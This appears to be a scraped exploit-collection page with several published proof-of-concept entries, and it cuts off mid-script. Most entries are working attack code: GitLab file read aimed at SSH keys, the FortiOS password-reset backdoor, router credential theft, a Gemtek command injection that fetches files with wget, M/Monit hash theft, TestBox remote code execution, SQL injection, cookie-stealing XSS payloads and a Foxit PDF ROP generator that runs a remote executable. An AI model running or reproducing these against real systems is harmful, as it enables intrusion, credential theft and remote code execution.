HireHackking

# Exploit Title: Gitlab 12.9.0 - Arbitrary File Read (Authenticated) # Google Dork: - # Date: 11/15/2020 # Exploit Author: Jasper Rasenberg # Vendor Homepage: https://about.gitlab.com # Software Link: https://about.gitlab.com/install # Version: tested on gitlab version 12.9.0 # Tested on: Kali Linux 2020.3 #You can create as many personal access tokens as you like from your GitLab profile. # Sign in to GitLab. # In the upper-right corner, click your avatar and select Settings. # On the User Settings menu, select Access Tokens. # Choose a name and optional expiry date for the token. # Choose the desired scopes. # Click the Create personal access token button. # Save the personal access token somewhere safe. If you navigate away or refresh your page, and you did not save the token, you must create a new one. # REFERENCE: https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html # pip3 install gitlab # pip3 install requests # Use a client cert to verify SSL or set to False import os import requests import json from time import sleep from gitlab import * session = requests.Session() session.verify = f'{os.getcwd()}/<cert.pem>' # or set session.verify = False host = '' def exploit(projectName, issueTitle, files, token): gl = Gitlab(host, private_token=token, session=session) gl.auth() p1 = gl.projects.create({'name': f"{projectName}-1"}) p2 = gl.projects.create({'name': f"{projectName}-2"}) for i, f in enumerate(files): stripped_f = f.rstrip('\n') issue = p1.issues.create({ \ 'title': f"{issueTitle}-{i}", 'description': \ "![a](/uploads/11111111111111111111111111111111/"\ f"../../../../../../../../../../../../../..{stripped_f})"}) print(issue.description) sleep(3) try: issue.move(p2.id) except Exception as e: pass sleep(3) if __name__ == "__main__": write_files = ['/etc/passwd', '~/.ssh/id_rsa'] with open('senstive_files', 'w') as sens: for file in write_files: sens.write(file) files = list(open('sensitive_files', 'r')) exploit('project-1', 'issue-1', files)

# Exploit Title: Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure # Date: 17th November 2020 # Exploit Author: Nitesh Surana # Vendor Homepage: https://www.gxgroup.eu/ont-products/ # Version: P4410-V2-1.34H # Tested on: Windows/Kali # CVE : CVE-2020-25988 import upnpy upnp = upnpy.UPnP() # Discover UPnP devices on the network # Returns a list of devices e.g.: [Device <Econet IGD>] devices = upnp.discover() # Select the device directly from the list device = devices[0] # Get the services available for this device # Returns a list of services available for the device # device.get_services() # We can now access a specific service on the device by its ID like a dictionary service = device['DeviceInfo1'] # Execute the action by its name (in our case, the 'X_GetAccess' action) # Returns a dictionary containing the cleartext password of 'admin' user. print("Admin Password: {}".format(service.X_GetAccess()['NewX_RootPassword']))

# Exploit Title: Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification # Google Dork: intitle:"Please Login" "Use FTM Push" # Date: 15/11/2020 # Exploit Author: Ricardo Longatto # Details: This exploit allow change users password from SSLVPN web portal # Vendor Homepage: https://www.fortinet.com/ # Version: Exploit to Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10. # Tested on: 6.0.4 # NVD: https://nvd.nist.gov/vuln/detail/CVE-2018-13382 # CVE : CVE-2018-13382 # Credits: Vulnerability by Meh Chang and Orange Tsai. #!/usr/bin/env python import requests, urllib3, sys, re, argparse urllib3.disable_warnings() menu = argparse.ArgumentParser(description = "[+] Exploit FortiOS Magic backdoor - CVE-2018-13382 [+]") menu.add_argument('-t', metavar='Target/Host IP', required=True) menu.add_argument('-p', metavar='Port', required=True) menu.add_argument('-u', metavar='User', required=True) menu.add_argument('--setpass', metavar='SetNewPass', default='h4ck3d', help='set the password for user, if you not set, the default password will be set to h4ck3d') op = menu.parse_args() host = op.t port = op.p user = op.u setpass = op.setpass url = "https://"+host+":"+port+"/remote/logincheck" exploit = {'ajax':'1','username':user,'magic':'4tinet2095866','credential':setpass} r = requests.post(url, verify=False, data = exploit) if re.search("/remote/hostcheck_install",r.text): print "[+] - The new password to ["+user+"] is "+setpass+" <<<< [+]" else: print "Exploit Failed. :/"

# Title: TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution # Author: Darren King # Date: 2020-07-23 # Vendor Homepage: https://www.ortussolutions.com/products/testbox # Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0 # Version : 2.4.0 through to 4.1.0 # Tested on: Adobe ColdFusion 11, Adobe ColdFusion 2016, Adobe ColdFusion 2018, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61 About TestBox ------------------------ TestBox is an open source testing framework for ColdFusion (CFML). It is written and maintained by Ortus Solutions, and can be downloaded/installed as a stand-alone package as well as being distributed as part of Ortus' ColdBox CFML MVC framework (https://www.coldbox.org/). TestBox is normally deployed in directories "/testbox" (or "/test") under the root of the corresponding ColdFusion/ColdBox application, and allows users to run CFML unit tests and to generate reports. https://www.ortussolutions.com/products/testbox https://github.com/Ortus-Solutions/testbox As per the vendor, TestBox is meant for development & testing purposes only and should not be deployed to production environments. Command Injection & RCE ------------------------ The file testbox/system/runners/HTMLRunner.cfm is vulnerable to command injection and can be exploited to obtain remote code execution on the remote host. The block below shows the vulnerable code: HTMLRunner.cfm, lines 51-73: // Write TEST.properties in report destination path. if( url.propertiesSummary ){ testResult = testbox.getResult(); errors = testResult.getTotalFail() + testResult.getTotalError(); savecontent variable="propertiesReport"{ writeOutput( ( errors ? "test.failed=true" : "test.passed=true" ) & chr( 10 ) ); writeOutput( "test.labels=#arrayToList( testResult.getLabels() )# test.bundles=#URL.bundles# test.directory=#url.directory# total.bundles=#testResult.getTotalBundles()# total.suites=#testResult.getTotalSuites()# total.specs=#testResult.getTotalSpecs()# total.pass=#testResult.getTotalPass()# total.fail=#testResult.getTotalFail()# total.error=#testResult.getTotalError()# total.skipped=#testResult.getTotalSkipped()#" ); } //ACF Compatibility - check for and expand to absolute path if( !directoryExists( url.reportpath ) ) url.reportpath = expandPath( url.reportpath ); fileWrite( url.reportpath & "/" & url.propertiesFilename, propertiesReport ); } If the "propertiesSummary" query string parameter is specified, the CFM page will write a properties file to the specified path with a summary of the tests performed. The reportpath and propertiesFilename values are both supplied as query string parameters and are unvalidated, meaning that the user can supply an arbitrary filename and have the application output a CFM file (i.e. propertiesFilename=evil.cfm) within the path of the application. The user can also specify the "labels" to apply to the test (via the "labels" query string parameter), which are included in the written properties file. Again, these labels are unvalidated and not sanitized, allowing arbitrary CFML tags and script to be passed to the code. When the properties are output to a CFM file (as per the propertiesFilename parameter), the written CFM can then be accessed via the browser and any corresponding CFML tags will be executed by the CFML server. (Note that Adobe ColdFusion often runs as the System user on Windows, which means it might be possible to achieve remote code execution as System in these circumstances.) Sample URL to write local CFM file: http://<HOST>/testbox/system/runners/HTMLRunner.cfm?propertiesSummary=true&reportpath=../runners&propertiesFilename=exec.cfm&labels=<pre><cfexecute name="%23url.cmd%23" arguments="%23url.args%23" timeout="5"></cfexecute></pre> Sample URL to confirm: http://<HOST>/testbox/system/runners/exec.cfm?cmd=whoami&args=/all Versions Affected ------------------------ Versions affected (and platform tested on): - Testbox-4.1.0+384-202005272329 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61) - Testbox-3.1.0+339-201909272036 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) - Testbox-3.0.0+309-201905040706 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) - Testbox-2.5.0+107-201705171812 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) - Testbox-2.4.0+80-201612030044 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) Timeline ------------------------ 2020-07-23 - Reserved CVEs 2020-08-04 - Disclosed issues to vendor 2020-08-04 - Response from vendor - not an issue. TestBox is a testing framework and is not meant to be deployed in production.

# Title: TestBox CFML Test Framework 4.1.0 - Directory Traversal # Author: Darren King # Date: 2020-07-23 # Vendor Homepage: https://www.ortussolutions.com/products/testbox # Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0 # Version : 2.3.0 through to 4.1.0 # Tested on: Adobe ColdFusion 11, Adobe ColdFusion 2016, Adobe ColdFusion 2018, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61 About TestBox ------------------------ TestBox is an open source testing framework for ColdFusion (CFML). It is written and maintained by Ortus Solutions, and can be downloaded/installed as a stand-alone package as well as being distributed as part of Ortus' ColdBox CFML MVC framework (https://www.coldbox.org/). TestBox is normally deployed in directories "/testbox" (or "/test") under the root of the corresponding ColdFusion/ColdBox application, and allows users to run CFML unit tests and to generate reports. https://www.ortussolutions.com/products/testbox https://github.com/Ortus-Solutions/testbox As per the vendor, TestBox is meant for development & testing purposes only and should not be deployed to production environments. Directory Traversal ------------------------ The TestBox "test-browser" page does not adequately sanitise the "path" QueryString parameter, allowing an attacker to perform a directory traversal on the page by specifying the value "path=/../" (appending '../' all the way up to the system root). Sample URL: http://<HOST>/testbox/test-browser/index.cfm?path=/../ Versions Affected ------------------------ Versions affected (and platform tested on): - Testbox-4.1.0+384-202005272329 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61) - Testbox-3.1.0+339-201909272036 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) - Testbox-3.0.0+309-201905040706 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) - Testbox-2.5.0+107-201705171812 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) - Testbox-2.4.0+80-201612030044 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) Timeline ------------------------ 2020-07-23 - Reserved CVEs 2020-08-04 - Disclosed issues to vendor 2020-08-04 - Response from vendor - not an issue. TestBox is a testing framework and is not meant to be deployed in production.

# Exploit Title: Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection # Date: 13/09/2020 # Exploit Author: Gabriele Zuddas # Version: 01.01.02.127, 01.01.02.141 # CVE : CVE-2020-24365 Service Provider : Linkem Product Name : LTE CPE Model ID : WVRTM-127ACN Serial ID : GMK170418011089 IMEI : XXXXXXXXXXXXX ICCID : XXXXXXXXXXXXXXXXXX Firmware Version : 01.01.02.141 Firmware Creation Date : May 15 13:04:30 CST 2019 Bootrom Version : U-Boot 1.1.3 Bootrom Creation Date : Oct 23 2015 - 16:03:05 LTE Support Band : 42,43 Injecting happens here: sh -c (ping -4 -c 1 -s 4 -W 1 "INJECTION" > /tmp/mon_diag.log 2>&1; cmscfg -s -n mon_diag_status -v 0)& Exploit has been tested on older verions too: Firmware Version: 01.01.02.127 Firmware Creation Date : May 23 15:34:10 CST 2018 """ import requests, time, argparse, re, sys class Exploit(): CVE = "CVE-2020-24365" def __init__(self, args): self.args = args self.session = requests.Session() def login(self): s = self.session r = s.post(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=login.asp&action=login", data={"user_name":self.args.username,"user_passwd":self.args.password}) if "sid" not in s.cookies: print("[!] Login failed.") exit(1) sid = s.cookies["sid"] s.headers = {"sid": sid} print(f"[*] Login successful! (sid={sid})") def now(self): return int(time.time() * 1000) def exploit(self, command): self.login() with self.session as s: payload = f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=$({command};)&mon_ping_num=1&mon_ping_size=4&mon_ping_timeout=1&mon_tracert_hops=&mon_diag_protocol_type=4&time={self.now()}&_={self.now()}" r = s.get(payload) r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}") content = str(r.content, "utf8") #Attempt to stop the command as some commands tend to get stuck (if commands stop working check on the web interface) r = s.get(payload) r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}") content = str(r.content, "utf8") #TODO: eventually parse content with regex to clean out the output c = re.findall(r"(?<=ping: bad address \')(.*)(?=\')", content) print(content) print(c[0]) if len(c) > 0: return c[0] else: return False def download_file(self, url): filename = url.rsplit('/', 1)[-1] if self.args.file is not None: print(f"[*] Attempting download of file '{filename}' from {url} ...") if self.exploit(f"wget {url} -O /tmp/{filename}"): print(f"[*] File saved on {self.args.target}'s /tmp/{filename}.") print(self.exploit(f"du -h /tmp/{filename}")) return True else: print(f"[!] Failed to download {filename} from {url}") return False def run(self): if self.args.command is not None: print(self.exploit(self.args.command)) exit() if self.args.file is not None: self.download_file(self.args.file) exit() if __name__ == "__main__": # Create the parser and add arguments parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", dest="target", default="192.168.1.1", help="Vulnerable target") parser.add_argument("-u", "--username", dest="username", default="admin", help="Valid username to use") parser.add_argument("-p", "--password", dest="password", default="admin", help="Valid password to use") parser.add_argument("-c", "--command", dest="command", default=None, help="Command to execute") parser.add_argument("-D", "--download-file", dest="file", default=None, help="Download file on target's /tmp directory") args = parser.parse_args() # Run exploit X = Exploit(args) if len(sys.argv) > 1: print(f"[*] Exploiting {X.CVE} ...") X.run() else: parser.print_help(sys.stderr)

# Title: M/Monit 3.7.4 - Privilege Escalation # Author: Dolev Farhi # Date: 2020-07-09 # Vendor Homepage: https://mmonit.com/ # Version : 3.7.4 import sys import requests url = 'http://your_ip_here:8080' username = 'test' password = 'test123' sess = requests.Session() sess.get(host) def login(): print('Attempting to login...') data = { 'z_username':username, 'z_password':password } headers = { 'Content-Type':'application/x-www-form-urlencoded' } resp = sess.post(url + '/z_security_check', data=data, headers=headers) if resp.ok: print('Logged in successfully.') else: print('Could not login.') sys.exit(1) def privesc(): data = { 'uname':username, 'fullname':username, 'password':password, 'admin':1 } resp = sess.post(url + '/api/1/admin/users/update', data=data) if resp.ok: print('Escalated to administrator.') else: print('Unable to escalate to administrator.') return if __name__ == '__main__': login() privesc()

# Title: M/Monit 3.7.4 - Password Disclosure # Author: Dolev Farhi # Date: 2020-07-09 # Vendor Homepage: https://mmonit.com/ # Version : 3.7.4 import sys import requests url = 'http://your_ip_here:8080' username = 'test' password = 'test123' sess = requests.Session() sess.get(host) def login(): print('Attempting to login...') data = { 'z_username':username, 'z_password':password } headers = { 'Content-Type':'application/x-www-form-urlencoded' } resp = sess.post(url + '/z_security_check', data=data, headers=headers) if resp.ok: print('Logged in successfully.') else: print('Could not login.') sys.exit(1) def steal_hashes(): resp = sess.get(url + '/api/1/admin/users/list') if resp.ok: for i in resp.json(): mmonit_user = i['uname'] result = sess.get(url + '/api/1/admin/users/get?uname={}'.format(mmonit_user)) mmonit_passw = result.json()['password'] print('Stolen MD5 hash. User: {}, Hash: {}'.format(mmonit_user, mmonit_passw)) if __name__ == '__main__': login() steal_hashes()

# Exploit Title: Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated) # Exploit Author: SunCSR (Sun* Cyber Security Research) - Nguyen Khang # Google Dork: N/A # Date: 2020-08-24 # Vendor Homepage: https://accesspressthemes.com # Software Link: https://wordpress.org/plugins/accesspress-social-icons/ # Version: <= 1.7.9 # Tested on: Ubuntu 18.04 Description: A blind SQL injection vulnerability is present in Ajax load more. <?php $si_id = esc_attr($atts['id']); global $wpdb; $table_name = $table_name = $wpdb->prefix . "aps_social_icons"; $icon_sets = $wpdb->get_results("SELECT * FROM $table_name where si_id = $si_id"); POC: POST /wordpress/index.php?rest_route=%2Fwp%2Fv2%2Fposts%2F66&_locale=user HTTP/1.1 Host: pwnme.me User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: application/json, */*;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://pwnme.me/wordpress/wp-admin/post.php?post=66&action=edit X-WP-Nonce: 514cd2ab3f X-HTTP-Method-Override: PUT Content-Type: application/json Origin: http://pwnme.me Content-Length: 103 Connection: close Cookie: wp-settings-time-2=1597912773; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_01c9c451f599e513a69d1e6bb6f8e273=author%7C1598405206%7Cwp7Nu56SQz9nIWmkqZr94WFIpGZ6VfcTT5KaYPUULWe%7C3c4c3a80cbfd049b95b04a6104ded9b05f33f8a9900ccec818d5aa43c7102c79; wp-settings-time-3=1598234126 {"id":66,"content":"<!-- wp:shortcode -->\n[aps-social id=\"4 and sleep(5)\"]\n<!-- /wp:shortcode -->"}

# Exploit Title: Nagios Log Server 2.1.7 - 'snapshot_name' Persistent Cross-Site Scripting # Date: 31.08.2020 # Exploit Author: Emre ÖVÜNÇ # Vendor Homepage: https://www.nagios.com/ # Software Link: https://www.nagios.com/products/nagios-log-server/ # Version: 2.1.7 # Tested on: Linux/ISO # Link: https://github.com/EmreOvunc/Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting # Description A stored cross-site scripting (XSS) in Nagios Log Server 2.1.7 can result in an attacker performing malicious actions to users who open a maliciously crafted link or third-party web page. # PoC To exploit vulnerability, someone could use a POST request to '/nagioslogserver/configure/create_snapshot' by manipulating 'snapshot_name' parameter in the request body to impact users who open a maliciously crafted link or third-party web page. POST /nagioslogserver/configure/create_snapshot HTTP/1.1 Host: [TARGET] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 117 DNT: 1 Connection: close Cookie: csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd; ls_session=883lergotgcjbh9bjgaeakosv5go2gbb; PHPSESSID=nbah0vkmibpudd1qh7qgnpgo53 Upgrade-Insecure-Requests: 1 csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd&snapshot_name=[XSS_PAYLOAD]

# Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution # Date: 2020-08-29 # Exploit Author: CrossWire # Vendor Homepage: https://www.foxitsoftware.com/ # Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English # Version: 9.0.1.1049 # Tested on: Microsoft Windows Server 2016 10.0.14393 # CVE : [2018-9958](https://nvd.nist.gov/vuln/detail/CVE-2018-9958) #!/usr/bin/python3 ''' =========================================================================== | PDF generator for Foxit Reader Remote Code Execution (CVE 2018-9958) | =========================================================================== | Written by: Kevin Dorland (CrossWire) | | Date: 08/29/2020 | | | | Exploit originally discovered by Steven Seeley (mr_me) of Source Incite | | | | References: | | https://www.exploit-db.com/exploits/44941 (Steven Seely Calc.exe PoC) | | https://www.exploit-db.com/exploits/45269 (Metasploit adaptation) | | | =========================================================================== ''' PDF_TEMPLATE = ''' %PDF 1 0 obj <</Pages 1 0 R /OpenAction 2 0 R>> 2 0 obj <</S /JavaScript /JS ( var heap_ptr = 0; var foxit_base = 0; var pwn_array = []; function prepare_heap(size){ var arr = new Array(size); for(var i = 0; i < size; i++){ arr[i] = this.addAnnot({type: "Text"});; if (typeof arr[i] == "object"){ arr[i].destroy(); } } } function gc() { const maxMallocBytes = 128 * 0x100000; for (var i = 0; i < 3; i++) { var x = new ArrayBuffer(maxMallocBytes); } } function alloc_at_leak(){ for (var i = 0; i < 0x64; i++){ pwn_array[i] = new Int32Array(new ArrayBuffer(0x40)); } } function control_memory(){ for (var i = 0; i < 0x64; i++){ for (var j = 0; j < pwn_array[i].length; j++){ pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4 } } } function leak_vtable(){ var a = this.addAnnot({type: "Text"}); a.destroy(); gc(); prepare_heap(0x400); var test = new ArrayBuffer(0x60); var stolen = new Int32Array(test); var leaked = stolen[0] & 0xffff0000; foxit_base = leaked - 0x01f50000; } function leak_heap_chunk(){ var a = this.addAnnot({type: "Text"}); a.destroy(); prepare_heap(0x400); var test = new ArrayBuffer(0x60); var stolen = new Int32Array(test); alloc_at_leak(); heap_ptr = stolen[1]; } function reclaim(){ var arr = new Array(0x10); for (var i = 0; i < arr.length; i++) { arr[i] = new ArrayBuffer(0x60); var rop = new Int32Array(arr[i]); rop[0x00] = heap_ptr; // pointer to our stack pivot from the TypedArray leak rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret rop[0x02] = 0x72727272; // junk rop[0x03] = foxit_base + 0x00001450 // pop ebp; ret rop[0x04] = 0xffffffff; // ret of WinExec rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret rop[0x0a] = foxit_base + 0x0041c6ca; // ret rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret //Path to executable <PATH TO EXECUTABLE> //End Path to executable rop[0x17] = 0x00000000; // adios, amigo } } function trigger_uaf(){ var that = this; var a = this.addAnnot({type:"Text", page: 0, name:"uaf"}); var arr = [1]; Object.defineProperties(arr,{ "0":{ get: function () { that.getAnnot(0, "uaf").destroy(); reclaim(); return 1; } } }); a.point = arr; } function main(){ leak_heap_chunk(); leak_vtable(); control_memory(); trigger_uaf(); } if (app.platform == "WIN"){ if (app.isFoxit == "Foxit Reader"){ if (app.appFoxitVersion == "9.0.1.1049"){ main(); } } } )>> trailer <</Root 1 0 R>> ''' import sys #Enforces 2 hex char byte notation. "0" becomes "0x00" def format_byte(b): if (len(b) > 2) and (b[0:2] == '0x'): b = b[2:] if len(b) == 1: b = '0' + b return '0x' + b def char2hex(c): return format_byte(hex(ord(c))) #Converts file path into array of eleven 32-bit hex words def path_to_machine_code(path,little_endian = True): print("[+] Encoding Path:",path) #ensure length if len(path) > 44: print("[CRITICAL] Path length greater than 44 characters (bytes). Aborting!") exit(-1) #Copy path into 4 character (32 bit) words (max 11) word_array = [] for i in range(11): word = '' if len(path): word += path[0:4] if len(path) >= 4 else path path = path[len(word):] if len(word) < 4: word += chr(0) * (4 - len(word)) word_array.append(word) #Convert chars to hex values and format to "0xAABBCCDD" notation hex_array = [] for word in word_array: #Reverse byte order to fit little endian standard if(little_endian): word = word[::-1] #Write bytes to hex strings hex_string = '0x' for char in word: hex_string += char2hex(char)[2:] #strip the 0x off the byte here hex_array.append(hex_string) return hex_array #writes encoded path to rop array to match template def create_rop(hex_arr, start_index = '0c'): ord_array = [] index = int(start_index,16) for instruction in hex_arr: full_instruction = f"\trop[{format_byte(hex(index))}] = {instruction};" ord_array.append(full_instruction) index += 1 return ('\n'.join(ord_array)) if __name__ == '__main__': if len(sys.argv) != 3: print(f"USAGE: {sys.argv[0]} <path to executable> <pdf filename>") print("-- EXAMPLES --") print(f"{sys.argv[0]} \\\\192.168.0.1\\exploits\\bad.exe evil.pdf") exit(-1) #Parse user args EXE_PATH = sys.argv[1] PDF_PATH = sys.argv[2] #Generate hex raw_hex = path_to_machine_code(EXE_PATH) print("[+] Machine Code:") for hex_word in raw_hex: print(hex_word) ord_string = create_rop(raw_hex) print("[+] Instructions to add:") print(ord_string) print("[+] Generating pdf...") print("\t- Filling template...") evil_pdf = PDF_TEMPLATE.replace('<PATH TO EXECUTABLE>',ord_string) print("\t- Writing file...") with open(PDF_PATH,'w') as fd: fd.write(evil_pdf) print("[+] Generated pdf:",PDF_PATH)

# Exploit Title: ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting # Date: 2020-08-22 # Exploit Author: Vyshnav NK # Vendor Homepage: https://www.elkarbackup.org/ # Software Link: https://github.com/elkarbackup/elkarbackup/wiki/Installation # Version: 1.3.3 # Tested on: Linux Reproduction Steps: 1 - Go to the elakarbackup/login 2 - Login with default credentials 3 - Go to Policies >> Action >> Edit any of the existing Policies >> Insert XSS Payload in Paramter "Policy[name] and Policy[Description]" 4 - Click on Save 5 - We can see the Javacript Code executed Sucessfully XSS Attack vectors : "><svg/onload=alert(4)> "><svg/onload=alert(document.cookie)> Request : POST /policy/1 HTTP/1.1 Host: ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com Connection: close Referer: http://ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com/policy/1? Cookie: PHPSESSID=03e0bcfa5864ffe758916b5e171c1505 Upgrade-Insecure-Requests: 1 Policy%5Bname%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5Bdescription%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5BhourlyHours%5D=12%3A00%7C15%3A00%7C21%3A00&Policy%5BhourlyDaysOfMonth%5D=&Policy%5BhourlyDaysOfWeek%5D=1%7C2%7C3%7C4%7C5&Policy%5BhourlyMonths%5D=&Policy%5BhourlyCount%5D=0&Policy%5BdailyHours%5D=21%3A00&Policy%5BdailyDaysOfMonth%5D=&Policy%5BdailyDaysOfWeek%5D=1%7C2%7C3%7C4%7C5&Policy%5BdailyMonths%5D=&Policy%5BdailyCount%5D=5&Policy%5BweeklyHours%5D=21%3A00&Policy%5BweeklyDaysOfMonth%5D=&Policy%5BweeklyDaysOfWeek%5D=1&Policy%5BweeklyMonths%5D=&Policy%5BweeklyCount%5D=4&Policy%5BmonthlyHours%5D=21%3A00&Policy%5BmonthlyDaysOfMonth%5D=1&Policy%5BmonthlyDaysOfWeek%5D=&Policy%5BmonthlyMonths%5D=&Policy%5BmonthlyCount%5D=12&Policy%5ByearlyHours%5D=21%3A00&Policy%5ByearlyDaysOfMonth%5D=&Policy%5ByearlyDaysOfWeek%5D=&Policy%5ByearlyMonths%5D=&Policy%5ByearlyCount%5D=0&Policy%5Bexclude%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5Binclude%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5BsyncFirst%5D=1&Policy%5B_token%5D=B6JELPCVSHiZrMvyEeeBdRMLYSKBWfUMUwBeLWw8XpI&weekly-day=on Response : <form data-bnv-message="Really delete policy "><svg/onload=alert(4)>?" class="delete-policy" action="/policy/1/delete" method="POST" style="display:inline">

# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS) # Date: 2020-08-20 # Exploit Author: Patrik Lantz # Vendor Homepage: https://pupnp.sourceforge.io/ # Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download # Version: <= 1.6.6 # Tested on: Linux # CVE : CVE-2012-5958 import socket payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:" payload += "A"*324 + "BBBB" payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n" byte_message = bytes(payload) s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(byte_message, ("239.255.255.250", 1900))

# Exploit Title: House Rental 1.0 - 'keywords' SQL Injection # Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) # Date: 2020-08-07 # Vendor Homepage: https://projectworlds.in # Software Link: https://projectworlds.in/wp-content/uploads/2019/06/home-rental.zip # Version: 1.0 # Tested On: Windows 10 Pro (x64_86) + XAMPP | Python 2.7 # CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') # OWASP Top Ten 2017: A1:2017-Injection # CVSS Base Score: 10.0 | Impact Subscore: 6.0 | Exploitability Subscore: 3.9 # CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H # Vulnerability Description: # House Rental v1.0 suffers from an unauthenticated SQL Injection vulnerability allowing remote attackers # to execute arbitrary code on the hosting webserver via sending a malicious POST request. # Vulnerable Source Code: # /config/config.php # 11 try { # 12 $connect = new PDO("mysql:host=".dbhost."; dbname=".dbname, dbuser, dbpass); # 13 $connect->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); # /index.php # 5 if(isset($_POST['search'])) { # 7 $keywords = $_POST['keywords']; # 11 $keyword = explode(',', $keywords); # 12 $concats = "("; # 13 $numItems = count($keyword); # 15 foreach ($keyword as $key => $value) { # 17 if(++$i === $numItems){ # 18 $concats .= "'".$value."'"; # 19 }else{ # 20 $concats .= "'".$value."',"; # 23 $concats .= ")"; # 47 $stmt = $connect->prepare("SELECT * FROM room_rental_registrations_apartment WHERE country IN $concats OR country IN $loc OR state IN $concats OR state IN $loc OR city IN $concats OR city IN $loc OR address IN $concats OR address IN $loc OR rooms IN $concats OR landmark IN $concats OR landmark IN $loc OR rent IN $concats OR deposit IN $concats"); # 48 $stmt->execute(); import requests, sys, re, json from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE] S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT] ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0] err = 